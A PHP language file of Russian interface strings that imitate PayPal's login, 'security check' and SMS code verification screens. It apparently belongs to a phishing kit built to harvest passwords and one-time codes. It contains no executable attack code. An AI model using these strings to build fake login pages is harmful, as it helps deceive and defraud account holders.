<?php

function lang($phrase){
    static $lang = array(
        '1' => 'Войдите в свой аккаунт PayPal',
        '2' => 'Электронная почта или мобильный номер',
        '3' => 'Пароль',
        '4' => 'Забыли пароль?',
        '5' => 'Войти',
        '6' => 'или',
        '7' => 'Зарегистрироваться',
        '8' => 'Английский',
        '9' => 'Французский',
        '10' => 'Испанский',
        '11' => '文',
        '12' => 'Быстрая проверка безопасности',
        '13' => 'Нам просто нужна дополнительная информация, чтобы подтвердить, что это вы.',
        '14' => 'Получить текст',
        '15' => 'Продолжая, вы подтверждаете, что у вас есть разрешение использовать этот номер телефона, и соглашаетесь получать текстовые сообщения для подтверждения вашей личности в этой сессии. Могут применяться тарифы оператора. Мы можем получать данные абонента и устройства от вашего беспроводного оператора для использования в целях риска и мошенничества.',
        '16' => 'Далее',
        '17' => 'Введите свой код.',
        '18' => 'Отправить повторно',
        '19' => 'Продолжить',
        '20' => 'Свяжитесь с нами',
        '21' => 'Конфиденциальность',
        '22' => 'Юридическая информация',
        '23' => 'Обновления политики',
        '24' => 'По всему миру',
        '25' => 'Неверный код. Мы отправили вам новый код.',
    );

    return $lang[$phrase];
}
?>
